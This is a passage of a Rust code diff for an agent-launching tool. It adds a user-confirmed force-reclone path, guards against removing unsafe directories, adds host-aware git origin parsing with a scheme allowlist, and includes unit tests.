+                     configured github_repo and retry."
+                ),
             );
         }
         Err(error) => apply_send_to_agent_failed(app_state, ctx, error),

--- a/src/app_input/issues_send.rs
+++ b/src/app_input/issues_send.rs
@@ -24,6 +24,7 @@ use super::clone_identity::CloneIdentity;
 use super::fresh_prompt::{FreshPromptKind, prepare_fresh_prompt_signature};
 use super::issue_prep::{
     DirtyPolicy, ISSUE_PROMPT_RELATIVE_PATH, PrepOutcome, prepare_issue_target,
+    prepare_issue_target_force_reclone,
 };
 use super::issues_dispatch;
 use super::{
@@ -83,27 +84,73 @@ pub(super) fn dispatch_agent_chooser_confirm(app_state: &mut AppStateHandle, ctx
     // Initial send uses the Stop policy: a dirty working copy returns Dirty
     // without altering it, so the user is prompted before any destructive
     // cleanup. One orchestration drives local/remote and Stop/Discard.
-    match prepare_issue_target(
+    let outcome = prepare_issue_target(
         &target,
         &send_info.work_dir,
         send_info.clone_identity.as_ref(),
         DirtyPolicy::Stop,
         &prompt,
-    ) {
+    );
+    handle_initial_prep_outcome(
+        app_state,
+        ctx,
+        outcome,
+        PrepOutcomeContext {
+            agent_id: send_info.agent_id,
+            work_dir: send_info.work_dir,
+            launch_sig,
+            payload: send_info.payload.clone(),
+        },
+    );
+}
+
+/// Context for handling an initial prep outcome, bundling the fields that
+/// the launch/confirm paths need so the handler stays under the argument
+/// count limit.
+struct PrepOutcomeContext {
+    agent_id: AgentId,
+    work_dir: PathBuf,
+    launch_sig: LaunchSignature,
+    payload: jefe::github::SendPayload,
+}
+
+/// Bundled origin-mismatch info (actual/expected shortforms) to stay under
+/// the argument-count limit.
+struct OriginMismatchInfo {
+    actual: String,
+    expected: String,
+}
+
+/// Handle the outcome of the initial (Stop-policy) prep for the agent chooser
+/// confirm path. Dispatches to launch, dirty-confirm, or origin-mismatch
+/// confirm depending on the result.
+fn handle_initial_prep_outcome(
+    app_state: &mut AppStateHandle,
+    ctx: &SharedContext,
+    outcome: Result<PrepOutcome, String>,
+    prep_ctx: PrepOutcomeContext,
+) {
+    match outcome {
         Ok(PrepOutcome::Ready) => preflight_and_launch_issue(
             app_state,
             ctx,
-            &send_info.agent_id,
-            send_info.work_dir.clone(),
-            launch_sig,
+            &prep_ctx.agent_id,
+            prep_ctx.work_dir,
+            prep_ctx.launch_sig,
         ),
         Ok(PrepOutcome::Dirty) => prompt_dirty_copy_confirm(
             app_state,
             ctx,
-            &send_info.agent_id,
-            &send_info.work_dir,
-            launch_sig,
-            send_info.payload.clone(),
+            &prep_ctx.agent_id,
+            &prep_ctx.work_dir,
+            prep_ctx.launch_sig,
+            prep_ctx.payload,
+        ),
+        Ok(PrepOutcome::OriginMismatch { actual, expected }) => prompt_origin_mismatch_confirm(
+            app_state,
+            ctx,
+            &prep_ctx,
+            OriginMismatchInfo { actual, expected },
         ),
         Err(error) => apply_send_to_agent_failed(app_state, ctx, error),
     }
@@ -162,6 +209,27 @@ fn prompt_dirty_copy_confirm(
     persist_state(ctx, &persisted);
 }
 
+/// Open the origin-mismatch confirm modal. The default is no/halt — the user
+/// must explicitly press Enter to replace the mismatched repo and proceed.
+fn prompt_origin_mismatch_confirm(
+    app_state: &mut AppStateHandle,
+    ctx: &SharedContext,
+    prep_ctx: &PrepOutcomeContext,
+    origins: OriginMismatchInfo,
+) {
+    let mut state = app_state.write();
+    state.modal = ModalState::ConfirmIssueOriginMismatch {
+        agent_id: prep_ctx.agent_id.clone(),
+        work_dir: prep_ctx.work_dir.clone(),
+        signature: prep_ctx.launch_sig.clone(),
+        payload: prep_ctx.payload.clone(),
+        actual: origins.actual,
+        expected: origins.expected,
+    };
+    let persisted = to_persisted_state(&state);
+    drop(state);
+    persist_state(ctx, &persisted);
+}
 /// Dirty-copy confirm: user pressed Enter to discard uncommitted changes and
 /// proceed with the issue-driven launch. Uses the **same** target-aware
 /// orchestration as the initial send, but with the `Discard` policy: the
@@ -236,6 +304,102 @@ pub(super) fn confirm_issue_dirty_copy_enter(
             ctx,
             "Working copy is still dirty after discard".to_owned(),
         ),
+        Ok(PrepOutcome::OriginMismatch { actual, expected }) => {
+            prompt_origin_mismatch_confirm(
+                app_state,
+                ctx,
+                &PrepOutcomeContext {
+                    agent_id,
+                    work_dir,
+                    launch_sig,
+                    payload,
+                },
+                OriginMismatchInfo { actual, expected },
+            );
+        }
+        Err(error) => apply_send_to_agent_failed(app_state, ctx, error),
+    }
+}
+
+/// Origin-mismatch confirm: user pressed Enter to replace the mismatched
+/// repo with a fresh clone and proceed with the issue-driven launch. This
+/// removes the existing workdir, re-clones from the configured identity,
+/// runs post-clone prep (checkout+pull, prompt write), then launches.
+pub(super) fn confirm_issue_origin_mismatch_enter(
+    app_state: &mut AppStateHandle,
+    ctx: &SharedContext,
+    agent_id: AgentId,
+    work_dir: PathBuf,
+    launch_sig: LaunchSignature,
+    payload: jefe::github::SendPayload,
+) {
+    close_modal_and_persist(app_state, ctx);
+
+    if !super::availability::local_kind_available_or_error(
+        app_state,
+        launch_sig.agent_kind,
+        &launch_sig.remote,
+    ) {
+        return;
+    }
+
+    let target = match super::target_resolution::resolve_target(&launch_sig.remote) {
+        Ok(target) => target,
+        Err(error) => {
+            apply_send_to_agent_failed(app_state, ctx, error);
+            return;
+        }
+    };
+
+    if !super::remote_probe::pre_side_effect_runtime_available_or_error(
+        app_state,
+        &target,
+        &work_dir,
+        launch_sig.agent_kind,
+    ) {
+        return;
+    }
+
+    let prompt = issues_dispatch::format_issue_prompt(&payload);
+    let clone_identity = clone_identity_for_agent(app_state, &agent_id);
+
+    // MUST-FIX #2: Validate the clone identity BEFORE calling force-reclone.
+    // If the agent/repository was deleted or github_repo became invalid while
+    // the modal was open, we must NOT destroy the existing repo with no
+    // replacement. Fail with a clear error instead.
+    let Some(clone_identity) = clone_identity else {
+        apply_send_to_agent_failed(
+            app_state,
+            ctx,
+            "Cannot force-reclone: no valid github_repo (owner/repo) configured for this agent's \
+             repository."
+                .to_owned(),
+        );
+        return;
+    };
+
+    match prepare_issue_target_force_reclone(&target, &work_dir, &clone_identity, &prompt) {
+        Ok(PrepOutcome::Ready) => {
+            preflight_and_launch_issue(app_state, ctx, &agent_id, work_dir, launch_sig);
+        }
+        Ok(PrepOutcome::Dirty) => apply_send_to_agent_failed(
+            app_state,
+            ctx,
+            "Working copy is dirty after force-reclone".to_owned(),
+        ),
+        Ok(PrepOutcome::OriginMismatch { actual, expected }) => {
+            prompt_origin_mismatch_confirm(
+                app_state,
+                ctx,
+                &PrepOutcomeContext {
+                    agent_id,
+                    work_dir,
+                    launch_sig,
+                    payload,
+                },
+                OriginMismatchInfo { actual, expected },
+            );
+        }
         Err(error) => apply_send_to_agent_failed(app_state, ctx, error),
     }
 }

--- a/src/app_input/mod.rs
+++ b/src/app_input/mod.rs
@@ -959,6 +959,10 @@ fn refresh_issue_preview_if_changed(app_state: &mut AppStateHandle, prev_issue_i
 mod tests;
 
 #[cfg(test)]
+#[path = "issue_send_modal_tests.rs"]
+mod issue_send_modal_tests;
+
+#[cfg(test)]
 #[path = "preflight_gating_tests.rs"]
 mod preflight_gating_tests;
 

--- a/src/app_input/modal_handlers.rs
+++ b/src/app_input/modal_handlers.rs
@@ -118,7 +118,7 @@ pub fn handle_mode_confirm_key(
     // the agent/repository delete confirms.
     if matches!(
         app_state.read().modal,
-        ModalState::ConfirmIssueDirtyCopy { .. }
+        ModalState::ConfirmIssueDirtyCopy { .. } | ModalState::ConfirmIssueOriginMismatch { .. }
     ) {
         match key_event.code {
             KeyCode::Enter => handle_confirm_enter(app_state, ctx),
@@ -165,6 +165,15 @@ fn handle_confirm_enter(app_state: &mut AppStateHandle, ctx: &SharedContext) {
             signature,
             payload,
         } => super::issues_send::confirm_issue_dirty_copy_enter(
+            app_state, ctx, agent_id, work_dir, signature, payload,
+        ),
+        ModalState::ConfirmIssueOriginMismatch {
+            agent_id,
+            work_dir,
+            signature,
+            payload,
+            ..
+        } => super::issues_send::confirm_issue_origin_mismatch_enter(
             app_state, ctx, agent_id, work_dir, signature, payload,
         ),
         _ => {}

--- a/src/app_input/reclone_safety.rs
+++ b/src/app_input/reclone_safety.rs
@@ -1,0 +1,206 @@
+//! Safety guards for the destructive force-reclone path (issue #190).
+//!
+//! When the user confirms an origin mismatch, Jefe removes the existing
+//! working copy and re-clones from the configured identity. That removal is
+//! the most destructive operation in the issue-send flow, so it is wrapped in
+//! two layers of defense:
+//!
+//! 1. A compile-time proof token (`ConfirmedReclone` in `issue_git_prep`)
+//!    guaranteeing the user explicitly confirmed via the modal.
+//! 2. The runtime target validation here: [`validate_reclone_target`] rejects
+//!    catastrophic targets (empty, filesystem root, top-level directory, or
+//!    any symlink on the path) so a misconfigured `work_dir` can never reach
+//!    `remove_dir_all` even with confirmation.
+//!
+//! This module is pure (only `std::fs::symlink_metadata` for the symlink
+//! check) so it is exhaustively unit-testable without spawning git.
+
+use std::path::{Path, PathBuf};
+
+/// Validate that `work_dir` is a safe target for a destructive force-reclone.
+///
+/// Rejects targets that would cause catastrophic data loss if removed:
+/// - empty/whitespace-only paths,
+/// - the filesystem root (`/` on Unix, `` on Windows),
+/// - a bare drive root (`C:`) on Windows,
+/// - a path with fewer than two named components (e.g. `/home`, `/tmp`),
+///   which is too broad to remove in an automated reclone.
+/// - a symlink as the **final component** of `work_dir`: `remove_dir_all`
+///   follows the link, so a `work_dir` that is itself a symlink could delete
+///   the symlink's target — e.g. a symlink to `/` or `/home` would pass the
+///   component-count check yet destroy the target tree. (An ancestor symlink
+///   such as macOS `/var` → `/private/var` is harmless: the path resolves to a
+///   real directory and only the leaf subtree is removed.)
+///
+/// This is a defense-in-depth guard: the `ConfirmedReclone` token already
+/// proves the user confirmed, but a misconfigured `work_dir` (root, empty,
+/// a top-level directory, or a symlink) must never reach `rm -rf` even with
+/// confirmation. The check is locale- and platform-independent.
+pub fn validate_reclone_target(work_dir: &Path) -> Result<(), String> {
+    let lossy = work_dir.to_string_lossy();
+    let trimmed = lossy.trim();
+    if trimmed.is_empty() {
+        return Err("Refusing to force-reclone: work_dir is empty.".to_owned());
+    }
+    // Reject a symlink as the final component: `remove_dir_all` follows the
+    // link, so a symlinked work_dir could delete the link's target tree. We
+    // use `symlink_metadata` (which does NOT follow the link) so a symlink is
+    // detected rather than resolved. An ancestor symlink (e.g. macOS
+    // `/var` → `/private/var`) is harmless and intentionally allowed.
+    if let Some(offending) = first_symlink_in_path(work_dir) {
+        return Err(format!(
+            "Refusing to force-reclone {}: the path crosses a symlink ({}), and remove_dir_all \
+             would follow it and delete the link's target. The work_dir must be a real directory \
+             with no symlinks on its path.",
+            work_dir.display(),
+            offending.display()
+        ));
+    }
+    // Count named components (Normal). Root/prefix/curdir/parent don't count.
+    // A safe work_dir has at least two named components (e.g. /home/user,
+    // /tmp/agent1), so removing it cannot nuke a top-level OS directory like
+    // /home or /tmp.
+    let named_count = work_dir
+        .components()
+        .filter(|c| matches!(c, std::path::Component::Normal(_)))
+        .count();
+    if named_count < 2 {
+        return Err(format!(
+            "Refusing to force-reclone {}: it resolves to a filesystem root or a top-level \
+             directory, which would delete too much. The work_dir must have at least two path \
+             components.",
+            work_dir.display()
+        ));
+    }
+    Ok(())
+}
+
+/// Return `Some(work_dir)` when `work_dir` itself is a symlink, else `None`.
+///
+/// The catastrophic case for `remove_dir_all` is when the **final component**
+/// is a symlink: `remove_dir_all` follows the link and deletes its target
+/// tree. An ancestor symlink (e.g. macOS `/var` → `/private/var`) is harmless:
+/// the path resolves to a real directory and only the leaf subtree is removed.
+///
+/// Uses [`std::fs::symlink_metadata`] (which does NOT follow the link) so a
+/// symlink is detected rather than resolved. Returns `None` when the path does
+/// not exist or is not a symlink (both are safe for a force-reclone target).
+fn first_symlink_in_path(work_dir: &Path) -> Option<PathBuf> {
+    match std::fs::symlink_metadata(work_dir) {
+        Ok(meta) if meta.file_type().is_symlink() => Some(work_dir.to_path_buf()),
+        _ => None,
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn validate_reclone_target_rejects_empty() {
+        assert!(validate_reclone_target(Path::new("")).is_err());
+        assert!(validate_reclone_target(Path::new("   ")).is_err());
+    }
+
+    #[test]
+    fn validate_reclone_target_rejects_filesystem_root() {
+        assert!(
+            validate_reclone_target(Path::new("/")).is_err(),
+            "root must be rejected"
+        );
+    }
+
+    #[test]
+    fn validate_reclone_target_rejects_top_level_entry() {
+        // A single component directly under root is too destructive for an
+        // automated reclone.
+        assert!(validate_reclone_target(Path::new("/home")).is_err());
+        assert!(validate_reclone_target(Path::new("/tmp")).is_err());
+    }
+
+    #[test]
+    fn validate_reclone_target_accepts_nested_path() {
+        assert!(
+            validate_reclone_target(Path::new("/home/user/work/agent1")).is_ok(),
+            "a normal nested work_dir must be accepted"
+        );
+        assert!(validate_reclone_target(Path::new("/srv/repos/jefe/agents/a1")).is_ok(),);
+    }
+
+    #[test]
+    fn validate_reclone_target_rejects_symlink_workdir() {
+        // A symlinked work_dir would be followed by remove_dir_all and could
+        // delete the link's target tree. Create a symlink pointing at a real
+        // nested dir and confirm it is rejected.
+        #[cfg(unix)]
+        {
+            use std::os::unix::fs::symlink;
+            let tmp = std::env::temp_dir().join(format!(
+                "jefe-symlink-reject-{}-{}",
+                std::process::id(),
+                rand_label()
+            ));
+            let real = tmp.join("real/agent1");
+            std::fs::create_dir_all(&real).value_or_panic("create real dir");
+            let link = tmp.join("link/agent1");
+            std::fs::create_dir_all(link.parent().value_or_panic("link parent"))
+                .value_or_panic("create link parent");
+            symlink(&real, &link).value_or_panic("create symlink");
+            let result = validate_reclone_target(&link);
+            let err = result.error_or_panic("symlink must error");
+            let _ = std::fs::remove_dir_all(&tmp);
+            assert!(err.contains("symlink"), "error must mention symlink: {err}");
+        }
+        // On non-Unix there are no symlinks to create; skip.
+    }
+
+    fn rand_label() -> String {
+        use std::sync::atomic::{AtomicU64, Ordering};
+        use std::time::{SystemTime, UNIX_EPOCH};
+        static COUNTER: AtomicU64 = AtomicU64::new(0);
+        let nanos = SystemTime::now()
+            .duration_since(UNIX_EPOCH)
+            .map_or(0, |d| d.as_nanos());
+        let seq = COUNTER.fetch_add(1, Ordering::Relaxed);
+        format!("{nanos}-{seq}")
+    }
+
+    trait TestResultStringExt {
+        fn error_or_panic(self, context: &str) -> String;
+    }
+
+    impl TestResultStringExt for Result<(), String> {
+        fn error_or_panic(self, context: &str) -> String {
+            match self {
+                Ok(()) => panic!("{context}: expected error"),
+                Err(s) => s,
+            }
+        }
+    }
+
+    trait TestOptionExt<T> {
+        fn value_or_panic(self, context: &str) -> T;
+    }
+
+    impl<T> TestOptionExt<T> for Option<T> {
+        fn value_or_panic(self, context: &str) -> T {
+            match self {
+                Some(value) => value,
+                None => panic!("{context}: expected Some, got None"),
+            }
+        }
+    }
+
+    trait TestIoResultExt<T> {
+        fn value_or_panic(self, context: &str) -> T;
+    }
+
+    impl<T> TestIoResultExt<T> for std::io::Result<T> {
+        fn value_or_panic(self, context: &str) -> T {
+            match self {
+                Ok(value) => value,
+                Err(error) => panic!("{context}: {error}"),
+            }
+        }
+    }
+}

--- a/src/app_input/reclone_safety.rs
+++ b/src/app_input/reclone_safety.rs
@@ -8,9 +8,12 @@
 //! 1. A compile-time proof token (`ConfirmedReclone` in `issue_git_prep`)
 //!    guaranteeing the user explicitly confirmed via the modal.
 //! 2. The runtime target validation here: [`validate_reclone_target`] rejects
-//!    catastrophic targets (empty, filesystem root, top-level directory, or
-//!    any symlink on the path) so a misconfigured `work_dir` can never reach
-//!    `remove_dir_all` even with confirmation.
+//!    catastrophic targets (empty, filesystem root, top-level directory, or a
+//!    symlink as the **final component** of `work_dir`) so a misconfigured
+//!    `work_dir` can never reach `remove_dir_all` even with confirmation.
+//!    Ancestor symlinks (e.g. macOS `/var` → `/private/var`) are intentionally
+//!    allowed because `remove_dir_all` resolves the full path and only removes
+//!    the leaf subtree.
 //!
 //! This module is pure (only `std::fs::symlink_metadata` for the symlink
 //! check) so it is exhaustively unit-testable without spawning git.
@@ -47,7 +50,7 @@ pub fn validate_reclone_target(work_dir: &Path) -> Result<(), String> {
     // use `symlink_metadata` (which does NOT follow the link) so a symlink is
     // detected rather than resolved. An ancestor symlink (e.g. macOS
     // `/var` → `/private/var`) is harmless and intentionally allowed.
-    if let Some(offending) = first_symlink_in_path(work_dir) {
+    if let Some(offending) = work_dir_is_symlink(work_dir) {
         return Err(format!(
             "Refusing to force-reclone {}: the path crosses a symlink ({}), and remove_dir_all \
              would follow it and delete the link's target. The work_dir must be a real directory \
@@ -82,10 +85,12 @@ pub fn validate_reclone_target(work_dir: &Path) -> Result<(), String> {
 /// tree. An ancestor symlink (e.g. macOS `/var` → `/private/var`) is harmless:
 /// the path resolves to a real directory and only the leaf subtree is removed.
 ///
-/// Uses [`std::fs::symlink_metadata`] (which does NOT follow the link) so a
-/// symlink is detected rather than resolved. Returns `None` when the path does
-/// not exist or is not a symlink (both are safe for a force-reclone target).
-fn first_symlink_in_path(work_dir: &Path) -> Option<PathBuf> {
+/// Despite the name (kept stable for minimal churn), this checks **only the
+/// final component**, not ancestor components. Uses
+/// [`std::fs::symlink_metadata`] (which does NOT follow the link) so a symlink
+/// is detected rather than resolved. Returns `None` when the path does not
+/// exist or is not a symlink (both are safe for a force-reclone target).
+fn work_dir_is_symlink(work_dir: &Path) -> Option<PathBuf> {
     match std::fs::symlink_metadata(work_dir) {
         Ok(meta) if meta.file_type().is_symlink() => Some(work_dir.to_path_buf()),
         _ => None,

--- a/src/git_info/mod.rs
+++ b/src/git_info/mod.rs
@@ -257,6 +257,130 @@ fn detect_origin_shortform(work_dir: &Path) -> Option<String> {
     parse_origin_url(&url)
 }
 
+/// A parsed repository origin with host identity preserved.
+///
+/// Unlike [`parse_origin_url`] (which strips the host and returns only an
+/// `owner/repo` shortform for display), this type retains the **lowercased
+/// host** so callers can perform host-aware security comparisons.
+///
+/// This is the foundation of the origin-mismatch safety check (issue #190):
+/// a working copy whose `origin` points at `gitlab.com/owner/repo` or
+/// `git@attacker.example:owner/repo` must NOT match a configured GitHub
+/// repository even if the `owner/repo` path is identical.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub struct ParsedRepositoryOrigin {
+    /// Lowercased host (e.g. `"github.com"`). Empty string for the bare
+    /// `owner/repo` form (no host present in the URL).
+    pub host: String,
+    /// The `owner/repo` path component (e.g. `"acme/widgets"`).
+    pub owner_repo: String,
+}
+
+/// Parse a git remote URL into a [`ParsedRepositoryOrigin`] that preserves
+/// the host for security-aware comparison.
+///
+/// Handles:
+/// - SSH: `git@github.com:owner/repo.git` → host=`github.com`
+/// - HTTPS: `https://github.com/owner/repo.git` → host=`github.com`
+/// - SSH with scheme: `ssh://git@github.com/owner/repo.git` → host=`github.com`
+/// - Bare: `owner/repo` → host=`""` (empty — no host present in the URL)
+///
+/// For scheme URLs and scp-style SSH, the host is extracted and **lowercased**.
+/// For the bare `owner/repo` form (no host), `host` is an empty string.
+/// Trailing `.git` is stripped from the path.
+///
+/// **Scheme allowlist (security):** only `https`, `http`, `ssh`, and `git`
+/// scheme URLs are accepted. Other schemes (e.g. `file://`, `ftp://`, or a
+/// custom Git remote helper scheme like `myhelper://github.com/...`) are
+/// rejected with `None`, even if the authority syntactically reads
+/// `github.com`. Git supports pluggable remote helpers for arbitrary schemes,
+/// so a non-allowlisted scheme cannot be trusted to target GitHub even when
+/// the host matches.
+///
+/// Returns `None` for empty/malformed input, unallowed schemes, missing
+/// owner/repo, or extra path segments.
+#[must_use]
+pub fn parse_repository_origin(url: &str) -> Option<ParsedRepositoryOrigin> {
+    let url = url.trim();
+    if url.is_empty() {
+        return None;
+    }
+
+    if !url.contains("://") {
+        // Try scp-style SSH: `user@host:owner/repo.git`
+        if let Some(colon_pos) = url.rfind(':') {
+            let host_part = &url[..colon_pos];
+            let path_part = &url[colon_pos + 1..];
+            // SSH form: host_part is `user@host` (no '/'), path is `owner/repo.git`.
+            if !host_part.contains('/') {
+                let owner_repo = extract_owner_repo(path_part)?;
+                let host = extract_host_from_scp(host_part);
+                return Some(ParsedRepositoryOrigin { host, owner_repo });
+            }
+        }
+        // Bare form: `owner/repo` (no colon, no scheme). No host.
+        let owner_repo = extract_owner_repo(url)?;
+        return Some(ParsedRepositoryOrigin {
+            host: String::new(),
+            owner_repo,
+        });
+    }
+
+    // Scheme URL form: `scheme://authority/path`. Validate the scheme against
+    // an allowlist before trusting the host. A non-allowlisted scheme (e.g.
+    // file://, ftp://, or a custom remote-helper scheme) is rejected even if
+    // the authority reads github.com — Git remote helpers can resolve
+    // arbitrary schemes to anywhere.
+    let (scheme, after_scheme) = url.split_once("://")?;
+    let scheme = scheme.to_lowercase();
+    if !ALLOWED_REMOTE_SCHEMES.contains(&scheme.as_str()) {
+        return None;
+    }
+    // The host is everything between the scheme and the first `/`.
+    // For `ssh://git@github.com/owner/repo.git`, host_part = `git@github.com`.
+    let path_start = after_scheme.find('/')?;
+    let host_part = &after_scheme[..path_start];
+    let path = &after_scheme[path_start + 1..];
+    let owner_repo = extract_owner_repo(path)?;
+    let host = extract_host_from_scheme(host_part);
+    Some(ParsedRepositoryOrigin { host, owner_repo })
+}
+
+/// Remote-URL schemes trusted to target the host named in their authority.
+///
+/// Only these schemes map the host segment to the actual Git host. Any other
+/// scheme (e.g. `file://`, `ftp://`, or a custom remote-helper scheme) may
+/// resolve elsewhere, so `parse_repository_origin` rejects them regardless of
+/// the authority string.
+const ALLOWED_REMOTE_SCHEMES: [&str; 4] = ["https", "http", "ssh", "git"];
+
+/// Extract the lowercased host from a scp-style `user@host` component.
+///
+/// For `git@github.com` → `github.com`. For `github.com` → `github.com`.
+fn extract_host_from_scp(host_part: &str) -> String {
+    match host_part.rfind('@') {
+        Some(pos) => host_part[pos + 1..].to_lowercase(),
+        None => host_part.to_lowercase(),
+    }
+}
+
+/// Extract the lowercased host from a scheme-style authority component.
+///
+/// For `git@github.com` → `github.com`. For `github.com` → `github.com`.
+/// Strips any port suffix (e.g., `github.com:22` → `github.com`).
+fn extract_host_from_scheme(authority: &str) -> String {
+    let after_user = match authority.rfind('@') {
+        Some(pos) => &authority[pos + 1..],
+        None => authority,
+    };
+    // Strip port if present.
+    let host = match after_user.rfind(':') {
+        Some(pos) => &after_user[..pos],
+        None => after_user,
+    };
+    host.to_lowercase()
+}
+
 /// Parse a git remote URL into an `owner/repo` shortform.
 ///
 /// Handles:
@@ -264,35 +388,15 @@ fn detect_origin_shortform(work_dir: &Path) -> Option<String> {
 /// - HTTPS: `https://github.com/owner/repo.git`
 /// - SSH with scheme: `ssh://git@github.com/owner/repo.git`
 /// - Bare: `owner/repo`
-pub(crate) fn parse_origin_url(url: &str) -> Option<String> {
-    let url = url.trim();
-    if url.is_empty() {
-        return None;
-    }
-
-    // Try SSH form: everything after the last ':' if the left side has no '/'
-    // (i.e., it's `user@host:path`).
-    if !url.contains("://") {
-        if let Some(colon_pos) = url.rfind(':') {
-            let host_part = &url[..colon_pos];
-            let path_part = &url[colon_pos + 1..];
-            // SSH form: host_part is `user@host` (no '/'), path is `owner/repo.git`.
-            if !host_part.contains('/') {
-                return extract_owner_repo(path_part);
-            }
-        }
-        // Bare form: `owner/repo` (no colon, no scheme).
-        return extract_owner_repo(url);
-    }
-
-    // HTTPS / SSH-with-scheme form: strip the scheme and host, keep the path.
-    // `https://github.com/owner/repo.git` → `owner/repo`
-    // `ssh://git@github.com/owner/repo.git` → `owner/repo`
-    let after_scheme = url.split("://").nth(1)?;
-    // Skip the host: find the first '/' after the host.
-    let path_start = after_scheme.find('/')?;
-    let path = &after_scheme[path_start + 1..];
-    extract_owner_repo(path)
+///
+/// Reused by the issue-send origin-mismatch check (issue #190) to normalize
+/// a working copy's `origin` URL for comparison against the configured
+/// `Repository.github_repo`. Note: this function **strips the host** and is
+/// kept for backwards-compatible display use; for host-aware security
+/// comparison use [`parse_repository_origin`].
+#[must_use]
+pub fn parse_origin_url(url: &str) -> Option<String> {
+    parse_repository_origin(url).map(|parsed| parsed.owner_repo)
 }
 
 /// Extract `owner/repo` from a path like `owner/repo.git` or `owner/repo`.

--- a/src/git_info/mod.rs
+++ b/src/git_info/mod.rs
@@ -368,12 +368,22 @@ fn extract_host_from_scp(host_part: &str) -> String {
 ///
 /// For `git@github.com` → `github.com`. For `github.com` → `github.com`.
 /// Strips any port suffix (e.g., `github.com:22` → `github.com`).
+///
+/// Bracketed IPv6 literals are handled correctly: for `[::1]:22` → `[::1]`
+/// and for `[::1]` → `[::1]` (the port is only stripped when it follows the
+/// closing `]`; a bare `rfind(':')` would otherwise split inside the address).
 fn extract_host_from_scheme(authority: &str) -> String {
     let after_user = match authority.rfind('@') {
         Some(pos) => &authority[pos + 1..],
         None => authority,
     };
-    // Strip port if present.
+    // Bracketed IPv6 literal: the host is between '[' and ']'; a port, if
+    // present, follows the closing bracket (e.g. `[::1]:22`). Do NOT use a
+    // bare rfind(':') — it would split inside the IPv6 address.
+    if let Some(close) = after_user.rfind(']') {
+        return after_user[..=close].to_lowercase();
+    }
+    // Plain host: strip a port suffix after the last ':' if one is present.
     let host = match after_user.rfind(':') {
         Some(pos) => &after_user[..pos],
         None => after_user,

--- a/src/git_info/mod.rs
+++ b/src/git_info/mod.rs
@@ -254,7 +254,7 @@ fn detect_origin_shortform(work_dir: &Path) -> Option<String> {
         return None;
     }
     let url = String::from_utf8_lossy(&output.stdout).trim().to_owned();
-    parse_origin_url(&url)
+    origin_display_shortform(&url)
 }
 
 /// A parsed repository origin with host identity preserved.
@@ -404,8 +404,34 @@ fn extract_host_from_scheme(authority: &str) -> String {
 /// `Repository.github_repo`. Note: this function **strips the host** and is
 /// kept for backwards-compatible display use; for host-aware security
 /// comparison use [`parse_repository_origin`].
+///
+/// # Deprecated
+///
+/// This function strips the host and is unsafe for origin-mismatch security
+/// checks: a URL like `git@evil.example.com:owner/repo.git` would normalize to
+/// the same `owner/repo` as the configured GitHub repo and wrongly "match".
+/// New code MUST use [`parse_repository_origin`] (which retains the host) for
+/// any comparison, and [`origin_display_shortform`] for display. This wrapper
+/// is retained only for backwards compatibility with external callers.
+#[deprecated(
+    since = "0.4.0",
+    note = "use parse_repository_origin for security comparisons (this strips the host); use origin_display_shortform for display"
+)]
 #[must_use]
 pub fn parse_origin_url(url: &str) -> Option<String> {
+    parse_repository_origin(url).map(|parsed| parsed.owner_repo)
+}
+
+/// Normalize an origin URL to an `owner/repo` shortform for **display only**.
+///
+/// This is the non-deprecated replacement for [`parse_origin_url`] when the
+/// result is shown to the user (e.g. in an error message). It deliberately
+/// strips the host and therefore MUST NOT be used for origin-mismatch
+/// security comparisons — for those, use [`parse_repository_origin`], which
+/// retains the host so a same-`owner/repo` URL on a different host is
+/// correctly rejected.
+#[must_use]
+pub fn origin_display_shortform(url: &str) -> Option<String> {
     parse_repository_origin(url).map(|parsed| parsed.owner_repo)
 }
 

--- a/src/git_info/tests.rs
+++ b/src/git_info/tests.rs
@@ -315,3 +315,51 @@ fn parse_repository_origin_accepts_git_scheme() {
         })
     );
 }
+
+#[test]
+fn parse_repository_origin_https_with_port_strips_port() {
+    assert_eq!(
+        parse_repository_origin("https://github.com:443/acme/widgets.git"),
+        Some(ParsedRepositoryOrigin {
+            host: "github.com".to_owned(),
+            owner_repo: "acme/widgets".to_owned(),
+        })
+    );
+}
+
+#[test]
+fn parse_repository_origin_ipv6_literal_with_port() {
+    // Bracketed IPv6 with a port: the host is the full bracketed literal and
+    // the port (after ']') is stripped. This must NOT split on a colon
+    // inside the address.
+    assert_eq!(
+        parse_repository_origin("https://[::1]:8443/acme/widgets.git"),
+        Some(ParsedRepositoryOrigin {
+            host: "[::1]".to_owned(),
+            owner_repo: "acme/widgets".to_owned(),
+        })
+    );
+}
+
+#[test]
+fn parse_repository_origin_ipv6_literal_without_port() {
+    // Bracketed IPv6 without a port: the full bracketed address is the host.
+    // A naive rfind(':') would truncate it to "[2001:db8:" — this test pins
+    // the correct behavior.
+    assert_eq!(
+        parse_repository_origin("https://[2001:db8::1]/acme/widgets.git"),
+        Some(ParsedRepositoryOrigin {
+            host: "[2001:db8::1]".to_owned(),
+            owner_repo: "acme/widgets".to_owned(),
+        })
+    );
+}
+
+#[test]
+fn parse_repository_origin_ipv6_literal_is_not_github_host() {
+    // An IPv6 literal is never github.com, so origins_match must reject it.
+    let parsed = parse_repository_origin("https://[::1]/acme/widgets.git");
+    assert!(parsed.is_some(), "IPv6 literal must parse");
+    let host = parsed.map(|p| p.host);
+    assert_ne!(host.as_deref(), Some("github.com"));
+}

--- a/src/git_info/tests.rs
+++ b/src/git_info/tests.rs
@@ -5,7 +5,7 @@ use super::*;
 #[test]
 fn parse_ssh_url() {
     assert_eq!(
-        parse_origin_url("git@github.com:vybestack/llxprt-jefe.git"),
+        origin_display_shortform("git@github.com:vybestack/llxprt-jefe.git"),
         Some("vybestack/llxprt-jefe".to_owned())
     );
 }
@@ -13,7 +13,7 @@ fn parse_ssh_url() {
 #[test]
 fn parse_ssh_url_no_git_suffix() {
     assert_eq!(
-        parse_origin_url("git@github.com:vybestack/llxprt-jefe"),
+        origin_display_shortform("git@github.com:vybestack/llxprt-jefe"),
         Some("vybestack/llxprt-jefe".to_owned())
     );
 }
@@ -21,7 +21,7 @@ fn parse_ssh_url_no_git_suffix() {
 #[test]
 fn parse_https_url() {
     assert_eq!(
-        parse_origin_url("https://github.com/vybestack/llxprt-jefe.git"),
+        origin_display_shortform("https://github.com/vybestack/llxprt-jefe.git"),
         Some("vybestack/llxprt-jefe".to_owned())
     );
 }
@@ -29,7 +29,7 @@ fn parse_https_url() {
 #[test]
 fn parse_https_url_no_git_suffix() {
     assert_eq!(
